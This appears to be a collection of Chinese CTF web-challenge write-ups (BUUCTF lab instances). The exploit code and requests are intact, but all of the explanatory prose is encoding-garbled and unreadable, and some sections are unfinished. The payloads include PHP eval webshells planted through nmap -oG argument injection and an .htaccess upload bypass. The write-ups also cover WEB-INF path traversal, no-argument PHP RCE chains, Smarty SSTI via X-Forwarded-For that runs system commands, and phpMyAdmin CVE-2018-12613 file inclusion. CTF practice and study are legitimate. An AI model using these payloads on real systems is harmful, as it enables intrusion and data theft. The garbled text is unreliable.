[Ç¿Íø± 2019]¸ßÃ÷µÄºÚ¿Í
½øÈëÍøÕ¾,Ìáʾ:
Ñã¹ýÁôÉù,È˹ýÁôÃû,´ËÍøÕ¾Òѱ»ºÚ
ÎÒÒ²ÊǺÜÅå·þÄãÃǹ«Ë¾µÄ¿ª·¢,Ìصر¸·ÝÁËÍøÕ¾Ô´Âëµ½www.tar.gzÒÔ¹©´ó¼Ò¹ÛÉÍ
ÏÂÔØwww.tar.gz,½âѹºóÓÐ3002¸öphpÎļþ,µ«ÀïÃæget postµÄ²ÎÊý¶¼ÊÇÔÓÂÒµÄ,×Ðϸ¹Û²ìphpÎļþ,·¢ÏÖ´óÁ¿µÄÀàËÆÕâÑùµÄ³É¶Ô³öÏÖµÄÓï¾ä:
$_GET['cXjHClMPs'] = ' ';
echo `{$_GET['cXjHClMPs']}`;
ÎÒÃÇ¿ÉÒÔÀûÓÃurl/?cXjHClMPs=cat /flag,À´ÕÒµ½×îÖÕ´ð°¸,¿ÉÒÔÀûÓýű¾·¢ÏÖ¿ÉÓòÎÊý:
todoδÍê³É
[BUUCTF 2018]Online Tool
´ò¿ªÍøÒ³,ÏÔʾԴ´úÂë:
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox);
chdir($sandbox);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
escapeshellarg()ºÍescapeshellcmd()
- ´«ÈëµÄ²ÎÊýÊÇ:
172.17.0.2' -v -d a=1 - ¾¹ý
escapeshellarg ´¦Àíºó±ä³ÉÁË'172.17.0.2'\'' -v -d a=1' ,¼´ÏȶԵ¥ÒýºÅתÒå,ÔÙÓõ¥ÒýºÅ½«×óÓÒÁ½²¿·ÖÀ¨ÆðÀ´´Ó¶øÆðµ½Á¬½ÓµÄ×÷ÓÃ,¼´ÒÔËüΪÖÐÐÄ·Ö¸îΪÈý²¿·Ö(ÔÚÁ½±ß¼Óµ¥ÒýºÅ) ¡£ - ¾¹ý
escapeshellcmd ´¦Àíºó±ä³É'172.17.0.2'\\'' -v -d a=1\' ,ÕâÊÇÒòΪescapeshellcmd ¶Ô\ ÒÔ¼°×îºóÄǸö²»Åä¶Ô¶ùµÄÒýºÅ½øÐÐÁËתÒå:http://php.net/manual/zh/function.escapeshellcmd.php - ×îºóÖ´ÐеÄÃüÁîÊÇ
curl '172.17.0.2'\\'' -v -d a=1\' ,ÓÉÓÚÖмäµÄ\\ ±»½âÊÍΪ\ ¶ø²»ÔÙÊÇתÒå×Ö·û,ËùÒÔºóÃæµÄ' ûÓб»×ªÒå,ÓëÔÙºóÃæµÄ' Åä¶Ô¶ù³ÉÁËÒ»¸ö¿Õ°×Á¬½Ó·û¡£ËùÒÔ¿ÉÒÔ¼ò»¯Îªcurl 172.17.0.2\ -v -d a=1' ,¼´Ïò172.17.0.2\ ·¢ÆðÇëÇó,POST Êý¾ÝΪa=1' ¡£
escapeshellarg »áÔÚ²ÎÊýÁ½±ß¼ÓÈëµ¥ÒýºÅ,ÕâÑùÎÒÃǵIJÎÊý¾Í»á±»½âÊÍΪ×Ö·û´®,ËùÒÔÎÒÃÇÐèÒª×Ô¼ºÔÚ²ÎÊýÀïÃæ¼ÓÈëµ¥ÒýºÅ,ÕâÑù¾Í¿ÉÒÔ¸úescapeshellarg ¼ÓÈëµÄµ¥ÒýºÅÐγÉÒýºÅ¶Ô,ÈÃÎÒÃǵIJÎÊý²»±»½âÊÍΪ×Ö·û´®,ÊäÈëurl:
todoÕâÀïµÄ-oGÔõôÏëµ½µÄ˵Ã÷һϡ£
/?host=' <?php @eval($_POST["password"]);?> -oG shell.php '
Ò³Ãæ»ØÏÔÉÏ´«µÄÎļþµÄÎļþ¼Ð:
you are in sandbox 5458152bd757cd8fd87bdf0712df1bc4Starting Nmap 7.70 ( https://nmap.org ) at 2021-03-28 03:06 UTC Nmap done: 0 IP addresses (0 hosts up) scanned in 2.63 seconds Nmap done: 0 IP addresses (0 hosts up) scanned in 2.63 seconds
ÀûÓÃÒϽ£¿Õ°×ÇøÓòÓÒ»÷Ìí¼ÓÊý¾Ý,ÉèÖÃÈçÏÂ:
URLµØÖ· http://d24500ab-c98b-47f9-9e2b-f8d6bbcc77a8.node3.buuoj.cn/5458152bd757cd8fd87bdf0712df1bc4/shell.php
Á¬½ÓÃÜÂë password
ÍøÕ¾±¸×¢
±àÂëÉèÖà UTF8
Á¬½ÓÀàÐÍ PHP
ÆäËû²»±ä¡£ÃÜÂë¿ÉÒÔËæ±ãÉèÖÃ,Òª¸ú$_POST["password"] Ò»Ö¡£
Á¬½Óºó²é¿´ÍøÕ¾Îļþ,ÔÚ¸ùĿ¼·¢ÏÖflag¡£
References
https://blog.csdn.net/qq_26406447/article/details/100711933
https://blog.csdn.net/weixin_44077544/article/details/102835099
https://mayi077.gitee.io/2020/07/30/BUUCTF-2018-Online-Tool/
https://www.anquanke.com/post/id/107336
https://blog.csdn.net/SKI_12/article/details/61651960
[RoarCTF 2019]Easy Java
todoÓÃdirsearchɨÃèÒ»ÏÂ
Java Web ¾ÍÓ¦¸ÃÏëµ½WEB-INF ÊÇJavaµÄWEBÓ¦ÓõݲȫĿ¼¡£²Â²â´ËÌâÊÇWEB-INF/web.xml й¶¡£WEB-INF Ö÷Òª°üº¬Ò»ÏÂÎļþ»òĿ¼:
/WEB-INF/web.xml :WebÓ¦ÓóÌÐòÅäÖÃÎļþ,ÃèÊöÁË servlet ºÍÆäËûµÄÓ¦ÓÃ×é¼þÅäÖü°ÃüÃû¹æÔò¡£/WEB-INF/classes/ :º¬ÁËÕ¾µãËùÓÐÓÃµÄ class Îļþ,°üÀ¨ servlet class ºÍ·Çservlet class ,ËûÃDz»ÄÜ°üº¬ÔÚ .jar ÎļþÖÐ/WEB-INF/lib/ :´æ·ÅwebÓ¦ÓÃÐèÒªµÄ¸÷ÖÖJARÎļþ,·ÅÖýöÔÚÕâ¸öÓ¦ÓÃÖÐÒªÇóʹÓõÄjar Îļþ,ÈçÊý¾Ý¿âÇý¶¯jar Îļþ/WEB-INF/src/ :Ô´ÂëĿ¼,°´ÕÕ°üÃû½á¹¹·ÅÖø÷¸öjava Îļþ¡£/WEB-INF/database.properties :Êý¾Ý¿âÅäÖÃÎļþ
©¶´¼ì²âÒÔ¼°ÀûÓ÷½·¨:ͨ¹ýÕÒµ½web.xml Îļþ,ÍƶÏclass ÎļþµÄ·¾¶,×îºóÖ±½Óclass Îļþ,ÔÚͨ¹ý·´±àÒëclass Îļþ,µÃµ½ÍøÕ¾Ô´Âë¡£
´ò¿ªÍøÒ³,·¢ÏֵǽҳÃæ,°´F12·¢ÏÖ:
<center><p><a href="Download?filename=help.docx" target="_blank">help</a></p></center>
µã»÷helpÁ´½Ó,ÍøÒ³ÏÔʾ:
java.io.FileNotFoundException:{help.docx}
µã»÷help Á´½Óʱ,ÓÃBurp Suite½Ø°ü:
GET /Download?filename=help.docx HTTP/1.1
Host: 80a6988f-e2c9-4a88-aa9c-ac8b56ce9059.node3.buuoj.cn
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://80a6988f-e2c9-4a88-aa9c-ac8b56ce9059.node3.buuoj.cn/Login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,en-GB;q=0.6
Cookie: JSESSIONID=85BC2CB679CEB4E9E06E4AB50565EEA6
Connection: close
½«GET ÐÞ¸ÄΪPOST (ÕâÀïºÜÄÑÏëµ½):
POST /Download HTTP/1.1
Host: 80a6988f-e2c9-4a88-aa9c-ac8b56ce9059.node3.buuoj.cn
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://80a6988f-e2c9-4a88-aa9c-ac8b56ce9059.node3.buuoj.cn/Login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,en-GB;q=0.6
Cookie: JSESSIONID=85BC2CB679CEB4E9E06E4AB50565EEA6
Connection: close
Content-Length: 18
filename=help.docx
ÏìÓ¦:
HTTP/1.1 500 Internal Server Error
Server: openresty
Date: Sun, 28 Mar 2021 03:53:42 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1585
Connection: close
Content-Disposition: attachment;filename=null
Content-Language: en
<!doctype html><html lang="en"><head><title>HTTP Status 500 a€¡° Internal Server Error</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 500 a€¡° Internal Server Error</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Description</b> The server encountered an unexpected condition that prevented it from fulfilling the request.</p><p><b>Exception</b></p><pre>java.lang.NullPointerException
java.io.FileInputStream.<init>(FileInputStream.java:130)
java.io.FileInputStream.<init>(FileInputStream.java:93)
com.wm.ctf.DownloadController.doPost(DownloadController.java:24)
javax.servlet.http.HttpServlet.service(HttpServlet.java:661)
javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
</pre><p><b>Note</b> The full stack trace of the root cause is available in the server logs.</p><hr class="line" /><h3>Apache Tomcat/8.5.24</h3></body></html>
ÐÞ¸ÄÇëÇóΪ:
POST /Download?filename=WEB-INF/web.xml HTTP/1.1
Host: 80a6988f-e2c9-4a88-aa9c-ac8b56ce9059.node3.buuoj.cn
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://80a6988f-e2c9-4a88-aa9c-ac8b56ce9059.node3.buuoj.cn/Login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,en-GB;q=0.6
Cookie: JSESSIONID=85BC2CB679CEB4E9E06E4AB50565EEA6
Connection: close
Content-Length: 0
ÏìÓ¦:
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 28 Mar 2021 03:50:14 GMT
Content-Type: application/xml
Content-Length: 1562
Connection: close
Content-Disposition: attachment;filename=WEB-INF/web.xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0">
<welcome-file-list>
<welcome-file>Index</welcome-file>
</welcome-file-list>
<servlet>
<servlet-name>IndexController</servlet-name>
<servlet-class>com.wm.ctf.IndexController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>IndexController</servlet-name>
<url-pattern>/Index</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>LoginController</servlet-name>
<servlet-class>com.wm.ctf.LoginController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>LoginController</servlet-name>
<url-pattern>/Login</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>DownloadController</servlet-name>
<servlet-class>com.wm.ctf.DownloadController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DownloadController</servlet-name>
<url-pattern>/Download</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>FlagController</servlet-name>
<servlet-class>com.wm.ctf.FlagController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>FlagController</servlet-name>
<url-pattern>/Flag</url-pattern>
</servlet-mapping>
</web-app>
ÐÞ¸ÄÇëÇóΪ:
POST /Download?filename=WEB-INF/classes/com/wm/ctf/FlagController.class HTTP/1.1
Host: 80a6988f-e2c9-4a88-aa9c-ac8b56ce9059.node3.buuoj.cn
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://80a6988f-e2c9-4a88-aa9c-ac8b56ce9059.node3.buuoj.cn/Login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,en-GB;q=0.6
Cookie: JSESSIONID=85BC2CB679CEB4E9E06E4AB50565EEA6
Connection: close
Content-Length: 0
ÍøÒ³ÄÚÈÝbase64 ½âÂëºóµÃµ½flag¡£
References
https://www.jianshu.com/p/cb7cbede3b37
https://www.cnblogs.com/Cl0ud/p/12177085.html
[GXYCTF2019]BabyUpload
´ò¿ªÍøÒ³,·¢ÏÖÊÇÎļþÉÏ´«ÀàÐÍ,Ïëµ½ÓÃ.htaccess ÉÏ´«,´´½¨Îļþ.htaccess ,дÈë
AddType application/x-httpd-php .png
È»ºóÉÏ´«.htaccess
.htaccess ÁíÍâÒ»¸öд·¨ ¿ÉÒÔÔÚ.htaccess ¼ÓÈëphp½âÎö¹æÔò,°ÑÎļþÃû°üº¬1µÄ½âÎö³Éphp <FilesMatch "1"> SetHandler application/x-httpd-php </FilesMatch> »òÕßSetHandler application/x-httpd-php ,ÀýÈçÎļþ1.png , ¾Í»áÒÔphpÖ´ÐС£
ÍøÒ³ÏÔʾ:
ÉÏ´«ÀàÐÍҲ̫¶¹ÇÁË°É!
˵Ã÷ÎÒÃÇÒªÐÞ¸ÄÎļþÀàÐÍ,ÉÏ´«.htaccess ʱ,ÓÃburp SuiteÀ¹½Ø:
POST / HTTP/1.1
Host: e187f0b7-22f0-4d7b-9ce5-97394f953367.node3.buuoj.cn
Content-Length: 336
Cache-Control: max-age=0
Origin: http://e187f0b7-22f0-4d7b-9ce5-97394f953367.node3.buuoj.cn
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1s7I5ajPkRlstANn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.63
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://e187f0b7-22f0-4d7b-9ce5-97394f953367.node3.buuoj.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,en-GB;q=0.6
Cookie: PHPSESSID=48a1bc67790c6d550409df2da3498f55
Connection: close
------WebKitFormBoundary1s7I5ajPkRlstANn
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: application/octet-stream
AddType application/x-httpd-php .png
------WebKitFormBoundary1s7I5ajPkRlstANn
Content-Disposition: form-data; name="submit"
?????
------WebKitFormBoundary1s7I5ajPkRlstANn--
½«Content-Type: application/octet-stream ÐÞ¸ÄΪContent-Type: image/jpeg ,ÉÏ´«ºóÏÔʾÉÏ´«³É¹¦,´´½¨Îļþhtaccess.png ,дÈë
<?php @eval($_POST["password"]);?>
ÏÔʾÉÏ´«Ê§°Ü
ÉÏ´«ÀàÐÍҲ̫¶¹ÇÁË°É!
˵Ã÷ÎļþÀàÐͲ»¶Ô,ÐÞ¸ÄContent-Type: image/png ÐÞ¸ÄΪContent-Type: image/jpeg ,ÉÏ´«ºóÌáʾ:
ÚÀ,±ðÃÉÎÒ°¡,Õâ±êÖ¾Ã÷ÏÔ»¹ÊÇphp°¡
ÐÞ¸Ähtaccess.png ÄÚÈÝ
GIF89a
<script language="php">eval($_POST['shell']);</script>
ÐÞ¸ÄContent-Type: image/png ÐÞ¸ÄΪContent-Type: image/jpeg ,È»ºóÉÏ´«,Ò³Ãæ»ØÏÔÉÏ´«µÄÎļþµÄÏà¶Ô·¾¶:
/var/www/html/upload/6c9e4529d0f1b11a10f97e7bdbedfece/htaccess.png succesfully uploaded!
ÀûÓÃÒϽ£¿Õ°×ÇøÓòÓÒ»÷Ìí¼ÓÊý¾Ý,ÉèÖÃÈçÏÂ:
URLµØÖ· http://7a5bab3a-9c97-4613-ac15-b875f4590ece.node3.buuoj.cn/upload/45373f6d5ca8e7f31a8b1ab615988658/htaccess.png
Á¬½ÓÃÜÂë password
ÍøÕ¾±¸×¢
±àÂëÉèÖà UTF8
Á¬½ÓÀàÐÍ PHP
ÆäËû²»±ä¡£ÃÜÂë¿ÉÒÔËæ±ãÉèÖÃ,Òª¸ú$_POST["password"] Ò»Ö¡£
Á¬½Óºó²é¿´ÍøÕ¾Îļþ,ÔÚ¸ùĿ¼·¢ÏÖflag¡£
References
https://www.cnblogs.com/wangtanzhi/p/12323313.html
[GXYCTF2019]½ûÖ¹Ì×ÍÞ
ʹÓÃgithack ÏÂÔØindex.php ,ÔÚpython2»·¾³ÊäÈë:
python GitHack.py http://15e5a8a8-249b-44d1-93f0-8716f36dd25b.node3.buuoj.cn/.git/
gitÏÂÔصØÖ·:https://github.com/lijiejie/GitHack
×Ô¶¯ÏÂÔØindex.php Ô´Âë:
<?php
include "flag.php";
echo "flagÔÚÄÄÀïÄØ?<br>";
if(isset($_GET['exp'])){
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
@eval($_GET['exp']);
}
else{
die("»¹²îÒ»µãŶ!");
}
}
else{
die("ÔٺúÃÏëÏë!");
}
}
else{
die("»¹Ïë¶Áflag,³ôµÜµÜ!");
}
}
?>
- ÐèÒªÒÔ
GET ÐÎʽ´«ÈëÒ»¸öÃûΪexp µÄ²ÎÊý¡£Èç¹ûÂú×ãÌõ¼þ»áÖ´ÐÐÕâ¸öexp ²ÎÊýµÄÄÚÈÝ¡£ - ¹ýÂËÁ˳£Óõļ¸¸öαÐÒé,²»ÄÜÒÔαÐÒé¶ÁÈ¡Îļþ¡£
(?R) ÒýÓõ±Ç°±í´ïʽ,ºóÃæ¼ÓÁË? µÝ¹éµ÷Óá£Ö»ÄÜÆ¥Åäͨ¹ýÎÞ²ÎÊýµÄº¯Êý,Ö»ÔÊÐíÖ´ÐÐÈçϸñʽº¯Êý:
a(b(c()));
a();
²»ÔÊÐí
a('123');
- ÕýÔòÆ¥ÅäµôÁË
et/na/info µÈ¹Ø¼ü×Ö,ºÜ¶àº¯Êý¶¼Óò»ÁË¡£ eval($_GET['exp']); µäÐ͵ÄÎÞ²ÎÊýRCE
Ê×ÏÈÐèÒªµÃµ½µ±Ç°Ä¿Â¼ÏµÄÎļþscandir() º¯Êý¿ÉÒÔɨÃ赱ǰĿ¼ÏµÄÎļþ,ÀýÈç:
<?php
print_r(scandir('.'));
?>
ÏÖÔÚÐèÒªÓÃÎÞ²ÎÊýº¯Êý¹¹Ôìscandir('.') :
localeconv() º¯Êý·µ»ØÒ»°üº¬±¾µØÊý×Ö¼°»õ±Ò¸ñʽÐÅÏ¢µÄÊý×é¡£¶øÊý×éµÚÒ»Ïî¾ÍÊÇ.,ÊäÈë:
/?exp=print_r(localeconv());
ÍøÒ³ÏÔʾ:
Array ( [decimal_point] => . [thousands_sep] => [int_curr_symbol] => [currency_symbol] => [mon_decimal_point] => [mon_thousands_sep] => [positive_sign] => [negative_sign] => [int_frac_digits] => 127 [frac_digits] => 127 [p_cs_precedes] => 127 [p_sep_by_space] => 127 [n_cs_precedes] => 127 [n_sep_by_space] => 127 [p_sign_posn] => 127 [n_sign_posn] => 127 [grouping] => Array ( ) [mon_grouping] => Array ( ) )
ÎÒÃÇ·¢ÏÖÊý×éµÚÒ»¸ö¾ÍÊÇ.¡£
current() ·µ»ØÊý×éÖеĵ±Ç°µ¥Ôª, ĬÈÏÈ¡µÚÒ»¸öÖµ¡£pos() ÊÇcurrent() µÄ±ðÃû,¹¦ÄÜÒ»Ñù¡£ÕâÀﻹÓÐÒ»¸ö֪ʶµã:
phpÊÖ²á²éѯpos() :
pos (PHP 4, PHP 5, PHP 7, PHP 8) pos ¡ª current() µÄ±ðÃû ˵Ã÷ ´Ëº¯ÊýÊǸú¯ÊýµÄ±ðÃû:current() ¡£
phpÊÖ²á²éѯcurrent() :
current (PHP 4, PHP 5, PHP 7, PHP 8) current ¡ª ·µ»ØÊý×éÖеĵ±Ç°Öµ ˵Ã÷ current( array | object $array) : mixed ÿ¸öÊý×éÖж¼ÓÐÒ»¸öÄÚ²¿µÄÖ¸ÕëÖ¸ÏòËü"µ±Ç°µÄ"µ¥Ôª,³õʼ»¯Ê±»áÖ¸Ïò¸ÃÊý×éÖеĵÚÒ»¸öÖµ¡£ ²ÎÊý array Òª²Ù×÷µÄÊý×é¡£ ·µ»ØÖµ current() º¯Êý·µ»Øµ±Ç°±»ÄÚ²¿Ö¸ÕëÖ¸ÏòµÄÊý×éµ¥ÔªµÄÖµ,²¢²»Òƶ¯Ö¸Õë¡£Èç¹ûÄÚ²¿Ö¸ÕëÖ¸Ïò³¬³öÁ˵¥ÔªÁбíµÄÄ©¶Ë,current() ½«·µ»Øfalse ¡£
²Î¼û ? end() - ½«Êý×éµÄÄÚ²¿Ö¸ÕëÖ¸Ïò×îºóÒ»¸öµ¥Ôª ? key() - ´Ó¹ØÁªÊý×éÖÐÈ¡µÃ¼üÃû ? each() - ·µ»ØÊý×éÖе±Ç°µÄ¼ü/ Öµ¶Ô²¢½«Êý×éÖ¸ÕëÏòÇ°Òƶ¯Ò»²½ ? prev() - ½«Êý×éµÄÄÚ²¿Ö¸Õëµ¹»Øһλ ? reset() - ½«Êý×éµÄÄÚ²¿Ö¸ÕëÖ¸ÏòµÚÒ»¸öµ¥Ôª ? next() - ½«Êý×éÖеÄÄÚ²¿Ö¸ÕëÏòÇ°Òƶ¯Ò»Î»
phpÊÖ²áÏÂÔصØÖ·:
http://cn2.php.net/get/php_manual_zh.chm/from/this/mirror
¡à current(localeconv()) ÓÀÔ¶¶¼ÊǸöµã,ÊäÈëurl:
/?exp=print_r(scandir(current(localeconv())));
ÍøÒ³ÏÔʾ:
Array ( [0] => . [1] => .. [2] => .git [3] => flag.php [4] => index.php )
·½·¨Ò»
ʹÓÃarray_reverse() ½«Êý×éÔªËصߵ¹¹ýÀ´,È»ºóÓÃnext() º¯Êý½«Ö¸ÕëÖ¸ÏòµÚ¶þ¸öÔªËØ,ÊäÈëurl:
/?exp=print_r(next(array_reverse(scandir(pos(localeconv())))));
ÍøÒ³ÏÔʾflag.php ,È»ºóÓÃshow_source() Êä³öflagÎļþ¡£
ÊäÈëurl:
/?exp=show_source(next(array_reverse(scandir(pos(localeconv())))));
µÃµ½flag¡£
·½·¨¶þ
array_flip() ½»»»Êý×éµÄ¼üºÍÖµ,ÊäÈëurl:
/?exp=var_dump(array_flip(scandir(current(localeconv()))));
ÕâÀïvar_dump() ºÍprint_r() ¶¼¿ÉÒÔ
ÍøÒ³Êä³ö:
array(5) { ["."]=> int(0) [".."]=> int(1) [".git"]=> int(2) ["flag.php"]=> int(3) ["index.php"]=> int(4) }
array_rand() ´ÓÊý×éÖÐËæ»úÈ¡³öÒ»¸ö»ò¶à¸öµ¥Ôª,²»¶ÏˢзÃÎʾͻ᲻¶ÏËæ»ú·µ»Ø,±¾ÌâÄ¿ÖÐscandir() ·µ»ØµÄÊý×éÖ»ÓÐ5¸öÔªËØ,ˢм¸´Î¾ÍÄÜË¢³öÀ´flag.php ,ÊäÈëurl:
/?exp=var_dump(array_rand(array_flip(scandir(current(localeconv())))));
ÊäÈëurl:
/?exp=show_source(array_rand(array_flip(scandir(current(localeconv())))));
¶àˢм¸´Î,µÃµ½flag¡£
·½·¨Èý
session_start() ¸æËß PHP ʹÓÃsession ,PHP ĬÈÏÊDz»Ö÷¶¯Ê¹ÓÃsession µÄ¡£
session_id() ¿ÉÒÔ»ñÈ¡µ½µ±Ç°µÄsession id ,¶øPHPSESSID ÔÊÐí×ÖĸºÍÊý×Ö³öÏÖ¡£
ÓÚÊÇÎÒÃÇÔÚCookie ÖмÓÈëÊý¾Ý PHPSESSID=flag.php ,È»ºó»ñÈ¡µ½µ±Ç° session id :
?exp=print_r(session_id(session_start()));
ÓÃburpsuiteÀ¹½Ø¡£¹¹ÔìÇëÇó:
GET /?exp=print_r(session_id(session_start())); HTTP/1.1
Host: 77965458-4610-428d-a777-71972491d489.node3.buuoj.cn
Cookie: PHPSESSID=flag.php
×¢Òâcookie ÏÂÃæ¿ÕÁ½ÐÐ,·ñÔòÎÞ·¨µÃµ½ÏìÓ¦,ÏìÓ¦:
HTTP/1.1 200 OK
Server: openresty
Date: Sat, 03 Apr 2021 06:45:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.6.40
Content-Length: 31
flagÔÚÄÄÀïÄØ?<br>flag.php
ÏÔʾflag,¹¹ÔìÇëÇó:
GET /?exp=show_source(session_id(session_start())); HTTP/1.1
Host: 77965458-4610-428d-a777-71972491d489.node3.buuoj.cn
cookie: PHPSESSID=flag.php
µÃµ½flag¡£×¢Òâcookie ÏÂÃæ¿ÕÁ½ÐÐ,·ñÔòÎÞ·¨µÃµ½ÏìÓ¦¡£
References
https://www.wh1teze.top/articles/2020/02/08/1581153047695.html
https://www.cnblogs.com/wangtanzhi/p/12260986.html
[BJDCTF2020]The mystery of ip
´ò¿ªÍøÒ³,ÔÚhint Ò³Ãæ°´F12 ·¢ÏÖ×¢ÊÍ:
<!-- Do you know why i know your ip? -->
´ò¿ªflagÒ³Ãæ,·¢ÏÖÎÒÃǵÄip ,ÎÒÃdz¢ÊÔÊÇ·ñ¿ÉÒÔ¿ØÖÆÕâ¸öip ,ÎÒÃDz²âËüÊÇÄ£°å×¢Èë,
X-Forwarded-For ÓÐSSTI ×¢Èë,¿ÉÒÔ¿ØÖÆÊäÈë,ÓÃburp SuiteÀ¹½Ø:
GET /flag.php HTTP/1.1
Host: node3.buuoj.cn:25292
X-forwarded-for: {system("ls")}
×¢ÒâX-Forwarded-For ÏÂÃæ¿ÕÁ½ÐÐ,·ñÔòÎÞ·¨µÃµ½ÏìÓ¦,ÏìÓ¦:
Your IP is : bootstrap
css
flag.php
header.php
hint.php
img
index.php
jquery
libs
templates_c
templates_c
¹¹ÔìÇëÇó:
GET /flag.php HTTP/1.1
Host: node3.buuoj.cn:25292
X-forwarded-for: {system("ls /")}
×¢ÒâX-Forwarded-For ÏÂÃæ¿ÕÁ½ÐÐ,·ñÔòÎÞ·¨µÃµ½ÏìÓ¦,ÏìÓ¦:
Your IP is : bin
dev
etc
flag
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
var
·¢ÏÖflag,¹¹ÔìÇëÇó:
GET /flag.php HTTP/1.1
Host: node3.buuoj.cn:25292
X-forwarded-for: {system("cat /flag")}
×¢ÒâX-Forwarded-For ÏÂÃæ¿ÕÁ½ÐÐ,·ñÔòÎÞ·¨µÃµ½ÏìÓ¦,µÃµ½flag¡£
References
https://www.cnblogs.com/wangtanzhi/p/12318630.html
[GWCTF 2019]ÎÒÓÐÒ»¸öÊý¾Ý¿â
ÓÃdirsearchɨÃèÊý¾Ý¿â,ÊäÈë:
python dirsearch.py -u http://0cc07639-e850-439b-91da-bc4789d9ed9b.node3.buuoj.cn/ -e * -x 429
ɨÃè·¢ÏÖphpmyadmin/ ¿ÉÒÔ·ÃÎÊ,ÊäÈëurl:
/phpmyadmin/
ÊäÈëurl:
/phpmyadmin/?target=pdf_pages.php%253f/../../../../../../../../flag
µÃµ½flag¡£CVE-2018-12613 ÏÔʾԴÂëÀïÃæÖ´ÐÐÁËÒ»´Îurldecode ,ÕâÀïҪ˫ÖØurl±àÂë,%253f Á½´Î½âÂëºóÊÇ?
»òÕß
/phpmyadmin/?target=db_datadict.php%3f/../../../../../../../../flag
Ò²¿ÉÒԵõ½flag¡£
»òÕß
/phpmyadmin/?target=db_sql.php%253f/../../../../../../../../flag
References
